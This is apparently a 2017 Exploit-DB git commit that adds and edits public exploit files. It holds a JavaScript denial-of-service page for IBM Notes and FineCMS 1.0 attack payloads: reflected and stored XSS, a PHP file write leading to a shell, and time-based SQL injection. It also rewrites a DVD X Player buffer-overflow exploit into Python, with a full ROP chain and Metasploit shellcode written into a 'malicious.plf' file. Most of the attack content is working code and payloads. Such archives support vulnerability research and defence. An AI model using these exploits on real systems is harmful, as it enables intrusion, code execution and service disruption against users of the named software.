DB: 2017-09-04

2 new exploits

IBM Notes 8.5.x/9.0.x - Denial of Service

FineCMS 1.0  - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2017-09-04 05:01:22 +00:00
parent a160bc0c68
commit 572d7c5002
4 changed files with 197 additions and 73 deletions

View file

@ -5665,6 +5665,7 @@ id,file,description,date,author,platform,type,port
42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0
42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0
42602,platforms/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -38384,3 +38385,4 @@ id,file,description,date,author,platform,type,port
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,32 @@
# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link: https://www-01.ibm.com/support/docview.wss?uid=swg24037141
# Exploit Author: Dhiraj Mishra
# Contact: http://twitter.com/mishradhiraj_
# Website: http://datarift.blogspot.in/
# CVE: CVE-2017-1129
# Category: IBM Notes (Console Application)
1. Description
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
2. Proof of concept
<html><head><title></title>
<script type="text/javascript">
while (true) try {
var object = { };
function g(f0) {
var f0 = (object instanceof encodeURI)('foo');
}
g(75);
} catch (g) { }
</script>
</head></html>
3. IBM Security Bulletin
www-01.ibm.com/support/docview.wss?uid=swg21999385

114
platforms/php/webapps/42603.txt Executable file
View file

@ -0,0 +1,114 @@
# # # # #
# Exploit Title: FineCMS 1.0 Multiple Vulnerabilities
# Dork: N/A
# Date: 29.08.2017
# Vendor Homepage : http://mvc.net.pl/
# Software Link: https://github.com/andrzuk/FineCMS
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: sohaip-hackerDZ
# Author Web: http://www.hacker-ar.com
# Author Social: @sohaip_hackerDZ
# # # # #
Reflected XSS in get_image.php
Technical Description:
file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded.
Proof of Concept(PoC)
http://your_finecms/application/lib/ajax/get_image.php?folder=1
POST:
id=1"><script>alert(1)</script>&name=1
Arbitrary File Modify
Technical Description:
The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell.
file /appalication/core/controller/template.php line50-line53
follow function save() file /appalication/core/model/template.php line26-line48
if file exists, we can modify it whihout any limit.
insterestingly, there are two more Vulnerability for same function in different files.
file /appalication/core/model/style.php line26-line48
file /appalication/core/model/script.php line26-line48
Proof of Concept(PoC)
http://your_finecms/index.php?route=template
http://your_finecms/index.php?route=style
http://your_finecms/index.php?route=script
POST:
contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz
Authenticated SQL injection
all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database.
Technical Description:
file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded.
file /stat/get_stat_data.php line30
the sql inject into sql_query and execute.
Proof of Concept(PoC)
http://your_finecms/index.php?route=excludes&action=add
POST:
visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz
and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep.
Stored XSS in images.php
FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting.
Technical Description:
when we upload the file
file application/core/controller/images.php line87
and follow the function add() file application/core/model/images.php line78
if filetype startwith "image",the filetype will insert into database
when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages.
Proof of Concept(PoC)
view the http://your_finecms/index.php?route=images&action=add and upload picture
modify the picture's filetype
view the detail of picture
Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages.
http://your_finecms/index.php?route=images&action=edit&id=15
view the detail of picture
Stored XSS in visitors.php
FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting.
Technical Description:
just like last vulnerability.
Proof of Concept(PoC)
visit any page with js script code. such as
index.php?route=images&action=view&id=14'"><script>alert(1)</script>

View file

@ -8,80 +8,56 @@
// # Tested on: Windows XP SP2, Windows XP SP3, Windows 7
// # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
import sys,os
main()
{
rop = "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x08\x11\x01\x10" # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
rop += "\xed\x06\x63\x61" # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
rop += "\xd8\x85\x63\x61" # XCHG EAX,ESI # RETN 00 [EPG.dll]
rop += "\x02\xd2\x62\x61" # POP EBP # RETN [EPG.dll]
rop += "\xc8\xca\x60\x61" # PUSH ESP [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\xff\xfa\xff\xff" # AFTER NEGATE --> 0x00000501
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
rop += "\x24\x01\x64\x61" # XCHG EAX,EBX # RETN [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\xc0\xff\xff\xff" # AFTER NEGATE --> 0x00000040
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
rop += "\xa2\x8b\x60\x61" # XCHG EAX,EDX # RETN [EPG.dll]
rop += "\x04\xb8\x60\x61" # POP ECX # RETN [EPG.dll]
rop += "\x54\x10\x66\x61" # WRITABLE LOCATION [EPG.dll]
rop += "\x87\xe5\x62\x61" # POP EDI # RETN [EPG.dll]
rop += "\x1d\x08\x63\x61" # RETN (ROP NOP) [EPG.dll]
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
rop += "\x90\x90\x90\x90" # PADDING
rop += "\x31\x08\x62\x61" # PUSHAD # RETN [EPG.dll]
char rop[] = "\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
"\x90\x90\x90\x90" // # PADDING
"\x90\x90\x90\x90" // # PADDING
"\x90\x90\x90\x90" // # PADDING
"\x90\x90\x90\x90" // # PADDING
"\x08\x11\x01\x10" // # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
"\xed\x06\x63\x61" // # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
"\xd8\x85\x63\x61" // # XCHG EAX,ESI # RETN 00 [EPG.dll]
"\x02\xd2\x62\x61" // # POP EBP # RETN [EPG.dll]
"\xc8\xca\x60\x61" // # PUSH ESP [EPG.dll]
"\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
"\xff\xfa\xff\xff" // # AFTER NEGATE --> 0x00000501
"\x9c\x7d\x62\x61" // # NEG EAX # RETN [EPG.dll]
"\x24\x01\x64\x61" // # XCHG EAX,EBX # RETN [EPG.dll]
"\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
"\xc0\xff\xff\xff" // # AFTER NEGATE --> 0x00000040
"\x9c\x7d\x62\x61" // # NEG EAX # RETN [EPG.dll]
"\xa2\x8b\x60\x61" // # XCHG EAX,EDX # RETN [EPG.dll]
"\x04\xb8\x60\x61" // # POP ECX # RETN [EPG.dll]
"\x01\xb0\x64\x61" // # WRITABLE LOCATION [EPG.dll]
"\x87\xe5\x62\x61" // # POP EDI # RETN [EPG.dll]
"\x1d\x08\x63\x61" // # RETN (ROP NOP) [EPG.dll]
"\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
"\x90\x90\x90\x90" // # PADDING
"\x31\x08\x62\x61"; // # PUSHAD # RETN [EPG.dll]
// # msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x00\x0a\x0d\x1a" -t c
// # Around 400 bytes for shellcode :)
char sc[] = "\xba\x7a\x70\x9a\xd3\xd9\xc0\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x33\x31\x56\x12\x83\xc6\x04\x03\x2c\x7e\x78\x26\x2c\x96\xf5"
"\xc9\xcc\x67\x66\x43\x29\x56\xb4\x37\x3a\xcb\x08\x33\x6e\xe0"
"\xe3\x11\x9a\x73\x81\xbd\xad\x34\x2c\x98\x80\xc5\x80\x24\x4e"
"\x05\x82\xd8\x8c\x5a\x64\xe0\x5f\xaf\x65\x25\xbd\x40\x37\xfe"
"\xca\xf3\xa8\x8b\x8e\xcf\xc9\x5b\x85\x70\xb2\xde\x59\x04\x08"
"\xe0\x89\xb5\x07\xaa\x31\xbd\x40\x0b\x40\x12\x93\x77\x0b\x1f"
"\x60\x03\x8a\xc9\xb8\xec\xbd\x35\x16\xd3\x72\xb8\x66\x13\xb4"
"\x23\x1d\x6f\xc7\xde\x26\xb4\xba\x04\xa2\x29\x1c\xce\x14\x8a"
"\x9d\x03\xc2\x59\x91\xe8\x80\x06\xb5\xef\x45\x3d\xc1\x64\x68"
"\x92\x40\x3e\x4f\x36\x09\xe4\xee\x6f\xf7\x4b\x0e\x6f\x5f\x33"
"\xaa\xfb\x4d\x20\xcc\xa1\x1b\xb7\x5c\xdc\x62\xb7\x5e\xdf\xc4"
"\xd0\x6f\x54\x8b\xa7\x6f\xbf\xe8\x58\x3a\xe2\x58\xf1\xe3\x76"
"\xd9\x9c\x13\xad\x1d\x99\x97\x44\xdd\x5e\x87\x2c\xd8\x1b\x0f"
"\xdc\x90\x34\xfa\xe2\x07\x34\x2f\x81\xc6\xa6\xb3\x68\x6d\x4f"
"\x51\x75";
# Metasploit calc.exe shellcode -b "\x00\x0a\x0d\x1a\x20"
buf = ""
buf += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
buf += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
buf += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
buf += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
buf += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
buf += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
buf += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
buf += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
buf += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
buf += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
buf += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
buf += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
buf += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
buf += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
buf += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
buf += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
char *exploit=malloc(900),*junk=malloc(260),*junk2=malloc(15),*junk3=malloc(20);
memset(junk,0x41,260);
memset(junk2,0x90,15);
memset(junk3,0x90,20);
strcpy(exploit,junk);
strcat(exploit,rop);
strcat(exploit,junk2);
strcat(exploit,sc);
strcat(exploit,junk3);
printf("\nDVD X Player Professional/Standard 5.5\n");
printf("Author: sickness\n");
printf("Creating malicious .plf file, please wait.\n");
usleep(50000);
FILE *evil;
evil=fopen("malicious.plf","w");
fwrite(exploit,1,900,evil);
fclose(evil);
printf("File created!\n\n");
return 0;
}
exploit = "\x41" * 260 + rop + "\x90" * 20 + buf + "\x90" * 50
file = open("malicious.plf", "w")
file.write(exploit)
file.close()